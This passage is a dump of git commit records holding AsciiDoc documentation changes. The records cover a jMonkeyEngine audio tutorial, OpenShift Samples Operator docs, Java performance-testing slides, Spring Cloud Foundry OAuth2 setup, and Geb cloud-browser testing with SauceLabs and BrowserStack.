audio_gun.setPositional(false);\n audio_gun.setLooping(false);\n audio_gun.setVolume(2);\n rootNode.attachChild(audio_gun);\n\n----\n\n\n[IMPORTANT]\n====\nNote that setPositional(false) is pretty important when you use stereo sounds. Positional sounds must always be mono audio files, otherwise the engine will remind it to you with a crash.\n====\n\n\nThe nature sound is different: You want it to loop _continuously_ as background sound. This is why you set looping to true, and immediately call the play() method on the node. You also choose to set its volume to 3.\n\n[source,java]\n----\n\n audio_nature.setLooping(true); \/\/ activate continuous playing\n ...\n audio_nature.setVolume(3);\n rootNode.attachChild(audio_nature);\n audio_nature.play(); \/\/ play continuously!\n }\n----\n\nHere you make audio_nature a positional sound that comes from a certain place. For that you give the node an explicit translation, in this example, you choose Vector3f.ZERO (which stands for the coordinates `0.0f,0.0f,0.0f`, the center of the scene.) Since jME supports 3D audio, you are now able to hear this sound coming from this particular location. Making the sound positional is optional. If you don't use these lines, the ambient sound comes from every direction.\n\n[source,java]\n----\n\n ...\n audio_nature.setPositional(true);\n audio_nature.setLocalTranslation(Vector3f.ZERO.clone());\n ...\n\n----\n\n*Tip:* Attach AudioNodes into the scene graph like all nodes, to make certain moving nodes stay up-to-date. If you don't attach them, they are still audible and you don't get an error message but 3D sound will not work as expected. AudioNodes can be attached directly to the root node or they can be attached inside a node that is moving through the scene and both the AudioNode and the 3d position of the sound it is generating will move accordingly.\n\n*Tip:* playInstance always plays the sound from the position of the AudioNode so multiple gunshots from one gun (for example) can be generated this way, however if multiple guns are firing at once then an AudioNode is needed for each one.\n\n\n== Triggering Sound\n\nLet's have a closer look at `initKeys()`: As you learned in previous tutorials, you use the `inputManager` to respond to user input. Here you add a mapping for a left mouse button click, and name this new action `Shoot`.\n\n[source,java]\n----\n\n \/** Declaring \"Shoot\" action, mapping it to a trigger (mouse left click). *\/\n private void initKeys() {\n inputManager.addMapping(\"Shoot\", new MouseButtonTrigger(MouseInput.BUTTON_LEFT));\n inputManager.addListener(actionListener, \"Shoot\");\n }\n\n----\n\nSetting up the ActionListener should also be familiar from previous tutorials. You declare that, when the trigger (the mouse button) is pressed and released, you want to play a gun sound.\n\n[source,java]\n----\n\n \/** Defining the \"Shoot\" action: Play a gun sound. *\/\n private ActionListener actionListener = new ActionListener() {\n @Override\n public void onAction(String name, boolean keyPressed, float tpf) {\n if (name.equals(\"Shoot\") && !keyPressed) {\n audio_gun.playInstance(); \/\/ play each instance once!\n }\n }\n };\n----\n\nSince you want to be able to shoot fast repeatedly, so you do not want to wait for the previous gunshot sound to end before the next one can start. This is why you play this sound using the `playInstance()` method. This means that every click starts a new instance of the sound, so two instances can overlap. You set this sound not to loop, so each instance only plays once. As you would expect it of a gunshot.\n\n\n== Ambient or Situational?\n\nThe two sounds are two different use cases:\n\n* A gunshot is situational. You want to play it only once, right when it is triggered.\n** This is why you `setLooping(false)`.\n\n* The nature sound is an ambient, background noise. You want it to start playing from the start, as long as the game runs.\n** This is why you `setLooping(true)`.\n\n\nNow every sound knows whether it should loop or not. \n\nApart from the looping boolean, another difference is where `play().playInstance()` is called on those nodes:\n\n* You start playing the background nature sound right after you have created it, in the initAudio() method.\n[source,java]\n----\n audio_nature.play(); \/\/ play continuously!\n\n----\n\n* The gunshot sound, however, is triggered situationally, once, only as part of the `Shoot` input action that you defined in the ActionListener.\n[source,java]\n----\n\n \/** Defining the \"Shoot\" action: Play a gun sound. *\/\n private ActionListener actionListener = new ActionListener() {\n @Override\n public void onAction(String name, boolean keyPressed, float tpf) {\n if (name.equals(\"Shoot\") && !keyPressed) {\n audio_gun.playInstance(); \/\/ play each instance once!\n }\n }\n };\n----\n\n\n\n== Buffered or Streaming?\n\nAs of 3.1-alpha2, the Enum in the AudioNode constructor defines whether the audio is buffered or streamed. For example:\n\n[source,java]\n----\naudio_gunshot = new AudioNode(assetManager, \"Sound\/Effects\/Gun.wav\", DataType.Buffer); \/\/ buffered\n...\naudio_nature = new AudioNode(assetManager, \"Sound\/Environment\/Nature.ogg\", DataType.Stream); \/\/ streamed \n----\n\nTypically, you stream long sounds, and buffer short sounds.\n\n+++<strike>Note that streamed sounds can not loop (i.e. setLooping will not work as you expect). Check the getStatus on the node and if it has stopped recreate the node.<\/strike>+++ (In 3.1-alpha2, this is wrong).\nIf you still run 3.0, the above is still the case aswell as a simple boolean will be used instead of `DataType`\n\n\n== Play() or PlayInstance()?\n[cols=\"2\", options=\"header\"]\n|===\n\na|audio.play()\na|audio.playInstance()\n\na|Plays buffered sounds.\na|Plays buffered sounds. \n\na|Plays streamed sounds.\na|Cannot play streamed sounds.\n\na|The same sound cannot play twice at the same time.\na|The same sounds can play multiple times and overlap.\n\n|===\n\n\n== Your Ear in the Scene\n\nTo create a 3D audio effect, JME3 needs to know the position of the sound source, and the position of the ears of the player. The ears are represented by an 3D Audio Listener object. The `listener` object is a default object in a SimpleApplication.\n\nIn order to make the most of the 3D audio effect, you must use the `simpleUpdate()` method to move and rotate the listener (the player's ears) together with the camera (the player's eyes).\n\n[source,java]\n----\n\n public void simpleUpdate(float tpf) {\n listener.setLocation(cam.getLocation());\n listener.setRotation(cam.getRotation());\n }\n\n----\n\nIf you don't do that, the results of 3D audio will be quite random.\n\n\n== Global, Directional, Positional?\n\nIn this example, you defined the nature sound as coming from a certain position, but not the gunshot sound. This means your gunshot is global and can be heard everywhere with the same volume. JME3 also supports directional sounds which you can only hear from a certain direction. \n\nIt makes equal sense to make the gunshot positional, and let the ambient sound come from every direction. How do you decide which type of 3D sound to use from case to case?\n\n* In a game with moving enemies you may want to make the gun shot or footsteps positional sounds. In these cases you must move the AudioNode to the location of the enemy before `playInstance()`ing it. This way a player with stereo speakers hears from which direction the enemy is coming.\n* Similarly, you may have game levels where you want one background sound to play globally. In this case, you would make the AudioNode neither positional nor directional (set both to false).\n* If you want sound to be \u201cabsorbed by the walls and only broadcast in one direction, you would make this AudioNode directional. This tutorial does not discuss directional sounds, you can read about <<jme3\/advanced\/audio#,Advanced Audio>> here.\n\nIn short, you must choose in every situation whether it makes sense for a sound to be global, directional, or positional.\n\n\n== Conclusion\n\nYou now know how to add the two most common types of sound to your game: Global sounds and positional sounds. You can play sounds in two ways: Either continuously in a loop, or situationally just once. You know the difference between buffering short sounds and streaming long sounds. You know the difference between playing overlapping sound instances, and playing unique sounds that cannot overlap with themselves. You also learned to use sound files that are in either .ogg or .wav format.\n\n*Tip:* JME's Audio implementation also supports more advanced effects such as reverberation and Doppler effect. Use these \u201cpro features to make audio sound different depending on whether it's in the hallway, in a cave, outdoors, or in a carpeted room. Find out more about environmental effects from the sample code included in the jme3test directory and from the advanced <<jme3\/advanced\/audio#,Audio>> docs.\n\nWant some fire and explosions to go with your sounds? Read on to learn more about <<jme3\/beginner\/hello_effects#,effects>>.\n\n'''\n\nSee also:\n\n* <<jme3\/advanced\/audio#,Audio>>\n","returncode":0,"stderr":"","license":"cc0-1.0","lang":"AsciiDoc"} {"commit":"75de0da4f0a0e038f58c03a8f73e8301913827ef","subject":"Bug 1764353 Remove namespace and other minor updates","message":"Bug 1764353 Remove namespace and other minor updates\n","repos":"vikram-redhat\/openshift-docs,vikram-redhat\/openshift-docs,vikram-redhat\/openshift-docs,vikram-redhat\/openshift-docs,vikram-redhat\/openshift-docs","old_file":"modules\/samples-operator-crd.adoc","new_file":"modules\/samples-operator-crd.adoc","new_contents":"\/\/ Module included in the following assemblies:\n\/\/\n\/\/ * openshift_images\/configuring_samples_operator.adoc\n\n\n[id=\"samples-operator-crd{context}\"]\n= Accessing the Samples Operator configuration\n\nYou can configure the Samples Operator by editing the file with the provided\nparameters.\n\n.Prerequisites\n\n* Install the OpenShift Command-line Interface (CLI), commonly known as `oc`.\n\n.Procedure\n\n* Access the Samples Operator configuration:\n+\n----\n$ oc get configs.samples.operator.openshift.io\/cluster -o yaml\n----\n+\nThe Samples Operator configuration resembles the following example:\n+\n[source,yaml]\n----\napiVersion: samples.operator.openshift.io\/v1\nkind: Config\nprojectName: cluster-samples-operator\n...\n----\n","old_contents":"\/\/ Module included in the following assemblies:\n\/\/\n\/\/ * openshift_images\/configuring_samples_operator.adoc\n\n\n[id=\"samples-operator-crd{context}\"]\n= Accessing the Samples Operator file\n\nYou can configure the Samples Operator by editing the file with the provided\nparameters.\n\n.Procedure\n\n* Access the Samples Operator file:\n+\n----\n# oc get configs.samples.operator.openshift.io -n openshift-cluster-samples-operator\n----\n+\nThe following is an example of the Samples Operator file:\n+\n[source,yaml]\n----\napiVersion: samples.operator.openshift.io\/v1\nkind: SamplesResource\nprojectName: cluster-samples-operator\n...\n----\n","returncode":0,"stderr":"","license":"apache-2.0","lang":"AsciiDoc"} {"commit":"46a9c78c318e5412678d055d70bacb8c0679ad94","subject":"fix(process): fix link in TOC","message":"fix(process): fix link in TOC\n","repos":"arnauldvm\/jpt-course","old_file":"src\/main\/adoc\/4-process\/0-perf_test_process.adoc","new_file":"src\/main\/adoc\/4-process\/0-perf_test_process.adoc","new_contents":"\/\/ build_options: \nJava Performance Tuning - Performance Testing Process\n=====================================================\nArnauld Van Muysewinkel <avm@pendragon.be>\nv0.1, 28-Oct-2015: Initial version\n:backend: slidy\n\/\/:theme: volnitsky\n:data-uri:\n:copyright: Creative-Commons-Zero (Arnauld Van Muysewinkel)\n:icons:\n\n\nContent\n-------\n\n* <<_rtri_documentation,Documentation>>\n* <<_rtri_iteration,Iteration>>\n* <<_rtri_process_smals,Process for SIC@Smals>>\n** Steps\n\/\/ (p16)\n\/\/** Plan\n\/\/ (p18,19),\n** Mission Sheet\n\n_(link:..\/0-extra\/1-training_plan.html#_presentations[back to course plan])_\n\n\n▹ Documentation\n--------------------\n\n* Architecture document of the UoT\n* Test plan:\n** goals\n** scope (boundaries of the UoT)\n** resources required (! including key people for running the test or for solving issues)\n** schedulling\n* Requirements: performance goals\n* Test data: input data for the test scenario (! quantity and randomization)\n* Test protocol: process, scenarios, load profiles...\n* Test report:\n** all results (measures and calculations)\n** conclusions\n\n\n▹ Iteration\n----------------\n\n[WARNING]\n=====\n* Fix > *one* < issue at a time! +\nNot doing so exposes you to major problems.\n* Iterate only if it's worth the price +\n(i.e. does the client want to pay for the next performance improvement?)\n=====\n\n\n▹ Process @ Smals\n----------------------\n\n* [Project] Prepare Mission Sheet (V1)\n* Send V1 to SIC -> schedule KOM\n* [Project+SIC] KOM\n** Agree on the high level design of the test protocol (scenarios, load profiles...)\n* LOOP\n** [Project] Complete Mission Sheet (V2)\n*** Final artifacts\n*** Complete set of input data\n*** Complete set of users (attributes...)\n** [SIC] Detailed test protocol\n*** [Project] Support\n** [SIC] Prepare test environment\n*** [Project] Support\n*** [Middleware] Support\n** [SIC] Prepare test harness (jmeter scripts, SOAP clients, jenkins configuration...)\n*** [Project] Support\n** [SIC] Run test\n** [SIC] Analyse results\n** [SIC+Project] discuss results\n** ITERATE\n* [SIC] Prepare report\n** [Project] Review report\n* [SIC] Publish report\n\n\nMission Sheet\n-------------\n\nSee template in https:\/\/github.com\/arnauldvm\/jpt-course\/tree\/master\/data\/docs[data\/docs] in git repo\n\n\nProtocol\n--------\n\nSee legacy reference protocol in https:\/\/github.com\/arnauldvm\/jpt-course\/tree\/master\/data\/docs[data\/docs] in git repo\n\n\nThat's all folks!\n-----------------\n\n[cols=\"^\",grid=\"none\",frame=\"none\"]\n|=====\n|image:..\/thats-all-folks.png[link=\"#(1)\"]\n|=====\n","old_contents":"\/\/ build_options: \nJava Performance Tuning - Performance Testing Process\n=====================================================\nArnauld Van Muysewinkel <avm@pendragon.be>\nv0.1, 28-Oct-2015: Initial version\n:backend: slidy\n\/\/:theme: volnitsky\n:data-uri:\n:copyright: Creative-Commons-Zero (Arnauld Van Muysewinkel)\n:icons:\n\n\nContent\n-------\n\n* <<_rtri_documentation,Documentation>>\n* <<_rtri_process,Process>>\n* <<_rtri_process_smals,Process for SIC@Smals>>\n** Steps\n\/\/ (p16)\n\/\/** Plan\n\/\/ (p18,19),\n** Mission Sheet\n\n_(link:..\/0-extra\/1-training_plan.html#_presentations[back to course plan])_\n\n\n▹ Documentation\n--------------------\n\n* Architecture document of the UoT\n* Test plan:\n** goals\n** scope (boundaries of the UoT)\n** resources required (! including key people for running the test or for solving issues)\n** schedulling\n* Requirements: performance goals\n* Test data: input data for the test scenario (! quantity and randomization)\n* Test protocol: process, scenarios, load profiles...\n* Test report:\n** all results (measures and calculations)\n** conclusions\n\n\n▹ Iteration\n----------------\n\n[WARNING]\n=====\n* Fix > *one* < issue at a time! +\nNot doing so exposes you to major problems.\n* Iterate only if it's worth the price +\n(i.e. does the client want to pay for the next performance improvement?)\n=====\n\n\n▹ Process @ Smals\n----------------------\n\n* [Project] Prepare Mission Sheet (V1)\n* Send V1 to SIC -> schedule KOM\n* [Project+SIC] KOM\n** Agree on the high level design of the test protocol (scenarios, load profiles...)\n* LOOP\n** [Project] Complete Mission Sheet (V2)\n*** Final artifacts\n*** Complete set of input data\n*** Complete set of users (attributes...)\n** [SIC] Detailed test protocol\n*** [Project] Support\n** [SIC] Prepare test environment\n*** [Project] Support\n*** [Middleware] Support\n** [SIC] Prepare test harness (jmeter scripts, SOAP clients, jenkins configuration...)\n*** [Project] Support\n** [SIC] Run test\n** [SIC] Analyse results\n** [SIC+Project] discuss results\n** ITERATE\n* [SIC] Prepare report\n** [Project] Review report\n* [SIC] Publish report\n\n\nMission Sheet\n-------------\n\nSee template in https:\/\/github.com\/arnauldvm\/jpt-course\/tree\/master\/data\/docs[data\/docs] in git repo\n\n\nProtocol\n--------\n\nSee legacy reference protocol in https:\/\/github.com\/arnauldvm\/jpt-course\/tree\/master\/data\/docs[data\/docs] in git repo\n\n\nThat's all folks!\n-----------------\n\n[cols=\"^\",grid=\"none\",frame=\"none\"]\n|=====\n|image:..\/thats-all-folks.png[link=\"#(1)\"]\n|=====\n","returncode":0,"stderr":"","license":"cc0-1.0","lang":"AsciiDoc"} {"commit":"30bc45c5a84c6fc6c47fbbb26d3a1dd2f771f412","subject":"Fix asciidoc","message":"Fix asciidoc\n","repos":"jadekler\/spring-cloud-cloudfoundry,jadekler\/spring-cloud-cloudfoundry,spring-cloud\/spring-cloud-cloudfoundry,spring-cloud\/spring-cloud-cloudfoundry,jadekler\/spring-cloud-cloudfoundry","old_file":"src\/main\/asciidoc\/spring-cloud-cloudfoundry.adoc","new_file":"src\/main\/asciidoc\/spring-cloud-cloudfoundry.adoc","new_contents":"= Spring Cloud for Cloud Foundry\n\ninclude::intro.adoc[]\n\n== Quickstart\n\ninclude::quickstart.adoc[]\n\n== How Does it Work?\n\n=== OAuth2 Single Sign On\n\nSpring Cloud Security provides the `@EnableOAuth2Sso` annotation and\nbinds the app to environment properties in `oauth2.\\*`. Spring Cloud\nfor Cloud Foundry just sets up default environment properties so that\nit all just works if you bind to a Cloud Foundry service instance\ncalled \"sso\". The service credentials are mapped to the SSO\nproperties, i.e. (from `oauth2.client.*`) `clientId`, `clientSecret`,\n`tokenUri`, `authorizationUri`, (and from `oauth2.resource.*`)\n`userInfoUri`, `tokenInfoUri`, `keyValue`, `keyUri`. Refer to the\nSpring Cloud Security documentation for details of which combinations\nwill work together. The main thing is that in Cloud Foundry you only\nneed one service to cover all the necessary credentials.\n\nTo use a different sercice instance name (i.e. not \"sso\") just set\n`oauth2.sso.serviceId` to your custom name.\n\n=== JWT Tokens\n\nSpring Cloud Security already has support for decoding JWT tokens if\nyou just provide the verification key (as an environment property). In\nCloud Foundry you can pick that property up from a servcice binding\n(`keyValue` or `keyUri`).\n\nFor example the `keyUri` in PWS is\n\"https:\/\/uaa.run.pivotal.io\/token_key\":\n\n----\n$ curl https:\/\/uaa.run.pivotal.io\/token_key\n{\"alg\":\"SHA256withRSA\",\"value\":\"-----BEGIN PUBLIC KEY-----\\nMIIBI...\\n-----END PUBLIC KEY-----\\n\"}d\n----\n\n=== OAuth2 Resource Server\n\nSimilarly, the `@EnableOAuth2Resource` annotation will protect your\nAPI endpoints if you bind to a service instance called \"resource\".\nThe \"sso\" service above will work for a resource server as well (so\njust bind to that if it's there). If the OAuth2 tokens are JWTs (as in\nCloud Foundry), it is common to use a separate service for resources\nto avoid a network round trip decoding the token on every access. A\nuser-provided-service for an OAuth2 resource can be created like this\non PWS:\n\n----\n$ cf create-user-provided-service resource -p '{keyUri:\"https:\/\/uaa.run.pivotal.io\/token_key\"}\n----\n\nTo use JWT you need to add the verification key as either\n`keyValue` or `keyUri` (these could be added to the \"sso\"\nservice or the \"resource\" service if you have one).\n\nTo use a different sercice instance name (i.e. not \"resource\" or\n\"sso\") just set `oauth2.resource.serviceId` to your custom name.\n\n=== Default Environment Keys\n\nThe precise mapppings are as follows:\n\n* `oauth2.sso.\\*` to `vcap.services.${oauth2.sso.serviceId:sso}.credentials.*`\n\n* `oauth2.client.\\*` to `vcap.services.${oauth2.sso.serviceId:sso}.credentials.tokenUri:${vcap.services.${oauth2.resource.serviceId:resource}.credentials.*`\n\n* `oauth2.resource.(jwt).\\*` to `vcap.services.${oauth2.resource.serviceId:resource}.credentials.tokenUri:${vcap.services.${oauth2.sso.serviceId:sso}.credentials.*`\n\n\n","old_contents":"= Spring Cloud for Cloud Foundry\n\ninclude::intro.adoc[]\n\n== Quickstart\n\ninclude::quickstart.adoc[]\n\n== How Does it Work?\n\n=== OAuth2 Single Sign On\n\nSpring Cloud Security provides the `@EnableOAuth2Sso` annotation and\nbinds the app to environment properties in `oauth2.\\*`. Spring Cloud\nfor Cloud Foundry just sets up default environment properties so that\nit all just works if you bind to a Cloud Foundry service instance\ncalled \"sso\". The service credentials are mapped to the SSO\nproperties, i.e. (from `oauth2.client.\\*`) `clientId`, `clientSecret`,\n`tokenUri`, `authorizationUri`, (and from `oauth2.resource.\\*`)\n`userInfoUri`, `tokenInfoUri`, `keyValue`, `keyUri`. Refer to the\nSpring Cloud Security documentation for details of which combinations\nwill work together. The main thing is that in Cloud Foundry you only\nneed one service to cover all the necessary credentials.\n\nTo use a different sercice instance name (i.e. not \"sso\") just set\n`oauth2.sso.serviceId` to your custom name.\n\n=== JWT Tokens\n\nSpring Cloud Security already has support for decoding JWT tokens if\nyou just provide the verification key (as an environment property). In\nCloud Foundry you can pick that property up from a servcice binding\n(`keyValue` or `keyUri`).\n\nFor example the `keyUri` in PWS is\n\"https:\/\/uaa.run.pivotal.io\/token_key\":\n\n----\n$ curl https:\/\/uaa.run.pivotal.io\/token_key\n{\"alg\":\"SHA256withRSA\",\"value\":\"-----BEGIN PUBLIC KEY-----\\nMIIBI...\\n-----END PUBLIC KEY-----\\n\"}d\n----\n\n=== OAuth2 Resource Server\n\nSimilarly, the `@EnableOAuth2Resource` annotation will protect your\nAPI endpoints if you bind to a service instance called \"resource\".\nThe \"sso\" service above will work for a resource server as well (so\njust bind to that if it's there). If the OAuth2 tokens are JWTs (as in\nCloud Foundry), it is common to use a separate service for resources\nto avoid a network round trip decoding the token on every access. A\nuser-provided-service for an OAuth2 resource can be created like this\non PWS:\n\n----\n$ cf create-user-provided-service resource -p '{keyUri:\"https:\/\/uaa.run.pivotal.io\/token_key\"}\n----\n\nTo use JWT you need to add the verification key as either\n`keyValue` or `keyUri` (these could be added to the \"sso\"\nservice or the \"resource\" service if you have one).\n\nTo use a different sercice instance name (i.e. not \"resource\" or\n\"sso\") just set `oauth2.resource.serviceId` to your custom name.\n\n=== Default Environment Keys\n\nThe precise mapppings are as follows:\n\n* `oauth2.sso.\\*` to `vcap.services.${oauth2.sso.serviceId:sso}.credentials.*`\n\n* `oauth2.client.\\*` to `vcap.services.${oauth2.sso.serviceId:sso}.credentials.tokenUri:${vcap.services.${oauth2.resource.serviceId:resource}.credentials.*`\n\n* `oauth2.resource.(jwt).\\*` to `vcap.services.${oauth2.resource.serviceId:resource}.credentials.tokenUri:${vcap.services.${oauth2.sso.serviceId:sso}.credentials.*`\n\n\n","returncode":0,"stderr":"","license":"apache-2.0","lang":"AsciiDoc"} {"commit":"af0888077a0f72d47b273af7f3f8b66c497e9502","subject":"Add a snippet to the manual showing how to specify proxy settings for BrowserStack tunnel.","message":"Add a snippet to the manual showing how to specify proxy settings for BrowserStack tunnel.\n","repos":"ntotomanov-taulia\/geb,geb\/geb,ntotomanov-taulia\/geb,geb\/geb","old_file":"doc\/manual\/src\/docs\/asciidoc\/111-cloud-browsers.adoc","new_file":"doc\/manual\/src\/docs\/asciidoc\/111-cloud-browsers.adoc","new_contents":"= Cloud browser testing\n\nWhen you want to perform web testing on multiple browsers and operating systems, it can be quite complicated to maintain machines for each of the target environments.\nThere are a few companies that provide \"remote web browsers as a service\", making it easy to do this sort of matrix testing without having to maintain the multiple browser installations yourself.\nGeb provides easy integration with two such services, link:https:\/\/saucelabs.com\/[SauceLabs] and link:http:\/\/www.browserstack.com\/[BrowserStack].\nThis integration includes two parts: assistance with creating a driver in `GebConfig.groovy` and a Gradle plugin.\n\n== Creating a driver\n\nFor both SauceLabs and BrowserStack, a special driver factory is provided that, given a browser specification as well as an username and access key, creates an instance of `RemoteWebDriver` configured\nto use a browser in the cloud.\nExamples of typical usage in `GebConfig.groovy` are included below.\nThey will configure Geb to run in SauceLabs\/BrowserStack if the appropriate system property is set, and if not it will use whatever driver that is configured.\nThis is useful if you want to run the code in a local browser for development.\nIn theory you could use any system property to pass the browser specification but `geb.saucelabs.browser`\/`geb.browserstack.browser` are also used by the Geb Gradle plugins, so it's a good idea to\nstick with those property names.\n\nThe first parameter passed to the `create()` method is a \u201dbrowser specification\u201c and it should be a list of required browser capabilities in Java properties file format:\n\n----\nbrowserName=\u00abbrowser name as per values of fields in org.openqa.selenium.remote.BrowserType\u00bb\nplatform=\u00abplatform as per enum item names in org.openqa.selenium.Platform\u00bb\nversion=\u00abversion\u00bb\n----\n\nAssuming you're using the following snippet in your `GebConfig.groovy` to execute your code via SauceLabs with Firefox 19 on Linux, you would set the `geb.saucelabs.browser` system property to:\n\n----\nbrowserName=firefox\nplatform=LINUX\nversion=19\n----\n\nand to execute it with IE 9 on Vista to:\n\n----\nbrowserName=internet explorer\nplatform=VISTA\nversion=9\n----\n\nSome browsers like Chrome automatically update to the latest version; for these browsers you don't need to specify the version as there's only one, and you would use something like:\n\n----\nbrowserName=chrome\nplatform=MAC\n----\n\nas the \u201dbrowser specification\u201c. For a full list of available browsers, versions and operating systems refer to your cloud provider's documentation:\n\n* link:https:\/\/saucelabs.com\/docs\/platforms\/webdriver[SauceLabs platform list]\n* link:http:\/\/www.browserstack.com\/list-of-browsers-and-platforms?product=automate[BrowserStack Browsers and Platforms list]\n\nPlease note that Geb Gradle plugins can set the `geb.saucelabs.browser`\/`geb.browserstack.browser` system properties for you using the aforementioned format.\n\nFollowing the browser specification are the username and access key used to identify your account with the cloud provider.\nThe example uses two environment variables to access this information.\nThis is usually the easiest way of passing something secret to your build in open CI services like link:https:\/\/drone.io\/[drone.io] or link:https:\/\/travis-ci.org\/[Travis CI] if your code is public, but you can\nuse other mechanisms if desired.\n\nYou can optionally pass additional configuration settings by providing a Map to the `create()` method as the last parameter.\nThe configuration options available are described in your cloud provider's documentation:\n\n* link:https:\/\/saucelabs.com\/docs\/additional-config[SauceLabs additional config]\n* link:http:\/\/www.browserstack.com\/automate\/capabilities[BrowserStack Capabilities]\n\nFinally, there is also link:api\/geb\/driver\/CloudDriverFactory.html#create(java.lang.String,%20java.lang.String,%20Map%3CString,%20Object%3E)[an overloaded version of `create()` method] available that\ndoesn't take a string specification and allows you to simply specify all the required capabilities using a map.\nThis method might be useful if you just want to use the factory, but don't need the build level parametrization.\n\n[[sauce-labs-driver-factory]]\n=== `SauceLabsDriverFactory`\n\nThe following is an example of utilizing `SauceLabsDriverFactory` in `GebConfig.groovy` to configure a driver that will use a browser provided in the SauceLabs cloud.\n\n[source,groovy]\n----\ndef sauceLabsBrowser = System.getProperty(\"geb.saucelabs.browser\")\nif (sauceLabsBrowser) {\n driver = {\n def username = System.getenv(\"GEB_SAUCE_LABS_USER\")\n assert username\n def accessKey = System.getenv(\"GEB_SAUCE_LABS_ACCESS_PASSWORD\")\n assert accessKey\n new SauceLabsDriverFactory().create(sauceLabsBrowser, username, accessKey)\n }\n}\n----\n\n[[browser-stack-driver-factory]]\n=== `BrowserStackDriverFactory`\n\nThe following is an example of utilizing `BrowserStackDriverFactory` in `GebConfig.groovy` to configure a driver that will use a browser provided in the BrowserStack cloud.\n\n[source,groovy]\n----\ndef browserStackBrowser = System.getProperty(\"geb.browserstack.browser\")\nif (browserStackBrowser) {\n driver = {\n def username = System.getenv(\"GEB_BROWSERSTACK_USERNAME\")\n assert username\n def accessKey = System.getenv(\"GEB_BROWSERSTACK_AUTHKEY\")\n assert accessKey\n new BrowserStackDriverFactory().create(browserStackBrowser, username, accessKey)\n }\n}\n----\n\nIf using `localIdentifier` support:\n\n[source,groovy]\n----\ndef browserStackBrowser = System.getProperty(\"geb.browserstack.browser\")\nif (browserStackBrowser) {\n driver = {\n def username = System.getenv(\"GEB_BROWSERSTACK_USERNAME\")\n assert username\n def accessKey = System.getenv(\"GEB_BROWSERSTACK_AUTHKEY\")\n assert accessKey\n def localId = System.getenv(\"GEB_BROWSERSTACK_LOCALID\")\n assert localId\n new BrowserStackDriverFactory().create(browserStackBrowser, username, accessKey, localId)\n }\n}\n----\n\n== Gradle plugins\n\nFor both SauceLabs and BrowserStack, Geb provides a Gradle plugin which simplifies declaring the account and browsers that are desired, as well as configuring a tunnel to allow the cloud provider to\naccess local applications.\nThese plugins allow easily creating multiple `Test` tasks that will have the appropriate `geb.PROVIDER.browser` property set (where _PROVIDER_ is either `saucelabs` or `browserstack`).\nThe value of that property can be then passed in configuration file to <<sauce-labs-driver-factory>>\/<<browser-stack-driver-factory>> as the \u201dbrowser specification\u201c.\nExamples of typical usage are included below.\n\n=== geb-saucelabs plugin\n\nFollowing is an example of using the geb-saucelabs Gradle plugin.\n\n[source,groovy,subs=\"attributes,verbatim\"]\n----\nimport geb.gradle.saucelabs.SauceAccount\n\napply plugin: \"geb-saucelabs\" \/\/<1>\n\nbuildscript { \/\/<2>\n repositories {\n mavenCentral()\n }\n dependencies {\n classpath 'org.gebish:geb-gradle:{geb-version}'\n }\n}\n\nrepositories { \/\/<3>\n maven { url \"http:\/\/repository-saucelabs.forge.cloudbees.com\/release\" }\n}\n\ndependencies { \/\/<4>\n sauceConnect \"com.saucelabs:ci-sauce:1.81\"\n}\n\nsauceLabs {\n browsers { \/\/<5>\n firefox_linux_19\n chrome_mac\n delegate.\"internet explorer_vista_9\"\n nexus4 { \/\/<6>\n capabilities(\n browserName: \"android\",\n platform: \"Linux\",\n version: \"4.4\",\n deviceName: \"LG Nexus 4\"\n )\n }\n }\n task { \/\/<7>\n testClassesDir = test.testClassesDir\n testSrcDirs = test.testSrcDirs\n classpath = test.classpath\n }\n account { \/\/<8>\n username = System.getenv(SauceAccount.USER_ENV_VAR)\n accessKey = System.getenv(SauceAccount.ACCESS_KEY_ENV_VAR)\n }\n connect { \/\/<9>\n port = 4444 \/\/<10>\n additionalOptions = ['--proxy', 'proxy.example.com:8080'] \/\/<11>\n }\n}\n----\n<1> Apply the plugin to the build.\n<2> Specify how to resolve the plugin.\n<3> Declare a repository for resolving SauceConnect.\n<4> Declare version of SauceConnect to be used as part of the `sauceConnect` configuration. This will be used by tasks that open a {sauce-connect} tunnel before\nrunning the generated test tasks which means that the browsers in the cloud will have localhost pointing at the machine running the build.\n<5> Declare that tests should run in 3 different browsers using the shorthand syntax; this will generate the following `Test` tasks: `firefoxLinux19Test`, `chromeMacTest` and\n`internet explorerVista9Test`.\n<6> Explicitly specify the required browser capabilities if the shorthand syntax doesn't allow you to express all needed capabilities; the example will generate a `Test` task named `nexus4Test`.\n<7> Configure all of the generated test tasks; for each of them the closure is run with delegate set to a test task being configured.\n<8> Pass credentials for {sauce-connect}.\n<9> Additionally configure {sauce-connect} if desired.\n<10> Override the port used by SauceConnect, defaults to 4445.\n<11> Pass additional link:https:\/\/docs.saucelabs.com\/reference\/sauce-connect\/#command-line-options[command line options] to SauceConnect.\n\n[TIP]\n====\nYou can use `allSauceLabsTests` task that will depend on all of the generated test tasks to run all of them during a build.\n====\n\n=== geb-browserstack plugin\n\nFollowing is an example of using the geb-browserstack Gradle plugin.\n\n[source,groovy,subs=\"attributes,verbatim\"]\n----\nimport geb.gradle.browserstack.BrowserStackAccount\n\napply plugin: \"geb-browserstack\" \/\/<1>\n\nbuildscript { \/\/<2>\n repositories {\n mavenCentral()\n }\n dependencies {\n classpath 'org.gebish:geb-gradle:{geb-version}'\n }\n}\n\nbrowserStack {\n application 'http:\/\/localhost:8080' \/\/<3>\n forceLocal = true \/\/<4>\n browsers { \/\/<5>\n firefox_mac_19\n chrome_mac\n delegate.\"internet explorer_windows_9\"\n nexus4 { \/\/<6>\n capabilities browserName: \"android\", platform: \"ANDROID\", device: \"Google Nexus 4\"\n }\n }\n task { \/\/<7>\n testClassesDir = test.testClassesDir\n testSrcDirs = test.testSrcDirs\n classpath = test.classpath\n }\n account { \/\/<8>\n username = System.getenv(BrowserStackAccount.USER_ENV_VAR)\n accessKey = System.getenv(BrowserStackAccount.ACCESS_KEY_ENV_VAR)\n }\n}\n----\n<1> Apply the plugin to the build.\n<2> Specify how to resolve the plugin.\n<3> Specify which urls the BrowserStack Tunnel should be able to access.\nMultiple applications can be specified.\nIf no applications are specified, the tunnel will not be restricted to particular URLs.\n<4> Configure BrowserStack tunnel to route all traffic via the local machine.\nThis configuration property controls the `-forcelocal` flag and the default value for it is `false`.\n<5> Declare that tests should run in 3 different browsers using the shorthand syntax; this will generate the following `Test` tasks: `firefoxLinux19Test`, `chromeMacTest` and\n`internet explorerVista9Test`.\n<6> Explicitly specify the required browser capabilities if the shorthand syntax doesn't allow you to express all needed capabilities; the example will generate a `Test` task 